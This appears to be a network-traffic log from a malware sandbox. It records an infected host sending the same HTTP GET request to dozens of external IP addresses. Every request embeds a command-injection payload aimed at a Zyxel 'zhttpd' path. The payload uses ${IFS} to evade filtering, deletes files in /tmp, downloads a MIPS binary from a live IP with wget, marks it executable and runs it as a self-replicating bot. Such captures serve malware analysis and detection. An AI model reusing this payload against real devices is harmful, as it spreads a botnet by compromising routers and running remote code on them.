                                        Jan 14, 2024 16:18:46.500735044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4730192.168.2.135325442.69.177.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500793934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4731192.168.2.133522096.199.135.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500822067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4732192.168.2.1355590220.26.98.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500854969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4733192.168.2.1358580137.64.94.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500900030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4734192.168.2.1334076204.68.132.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500924110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4735192.168.2.1343240157.50.167.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.500957012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4736192.168.2.1350000184.247.51.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501020908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4737192.168.2.135651654.12.139.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501049995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4738192.168.2.136044672.182.106.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501099110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4739192.168.2.1347890201.20.79.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501142979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4740192.168.2.1350758100.7.43.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501189947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4741192.168.2.1352336168.9.182.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501236916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4742192.168.2.134642857.108.226.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501276970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4743192.168.2.134792467.25.191.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501306057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4744192.168.2.135563479.171.198.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501348972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4745192.168.2.1339312168.89.84.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501394033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4746192.168.2.1345870132.214.136.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501416922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4747192.168.2.1359180180.220.67.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501460075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4748192.168.2.1343994105.187.193.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501486063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4749192.168.2.1339818217.179.130.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501547098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4750192.168.2.1334536114.21.216.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501563072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4751192.168.2.1351362209.248.142.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501595020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4752192.168.2.1346290160.72.116.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501641989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4753192.168.2.135275288.1.152.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501691103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4754192.168.2.1335538203.35.122.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501730919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4755192.168.2.1342996205.253.152.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501751900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4756192.168.2.136030057.196.226.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501805067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4757192.168.2.1342514118.86.147.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501836061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4758192.168.2.1353414178.116.198.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501902103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4759192.168.2.1333788197.74.63.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501923084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4760192.168.2.1353312155.235.197.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.501975060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4761192.168.2.135081620.101.67.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502021074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4762192.168.2.133285646.33.138.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502074003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4763192.168.2.134316841.200.202.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502103090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4764192.168.2.1359870189.47.122.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502152920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4765192.168.2.133452019.234.18.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502180099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4766192.168.2.1340414197.124.52.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502245903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4767192.168.2.1349064123.186.181.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502276897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4768192.168.2.1360900103.12.41.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502327919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4769192.168.2.133961493.113.138.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502357960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4770192.168.2.135461837.141.153.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502396107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4771192.168.2.1360324159.152.196.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502418995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4772192.168.2.1360896118.189.115.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502491951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4773192.168.2.134891492.235.92.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502535105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4774192.168.2.1348106132.51.189.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502556086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4775192.168.2.1334294101.190.121.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502616882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4776192.168.2.1340152171.149.43.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502652884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4777192.168.2.134942058.17.115.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502700090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4778192.168.2.1334856197.107.47.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502742052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4779192.168.2.1340996175.115.17.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502780914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4780192.168.2.13586382.52.228.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502808094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4781192.168.2.134704260.183.35.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502846003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4782192.168.2.133669264.167.137.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502906084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4783192.168.2.1359772165.188.95.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502942085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4784192.168.2.1355326118.51.36.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.502957106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4785192.168.2.1338718163.169.15.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503021002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4786192.168.2.1334536161.173.189.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503058910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4787192.168.2.133317496.210.34.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503109932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4788192.168.2.134081071.75.49.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503143072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4789192.168.2.1357702172.248.169.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503206968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4790192.168.2.133951057.202.204.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503231049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4791192.168.2.1359422131.120.17.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:46.503278971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4792192.168.2.135763058.0.20.247443
                                        TimestampBytes transferredDirectionData
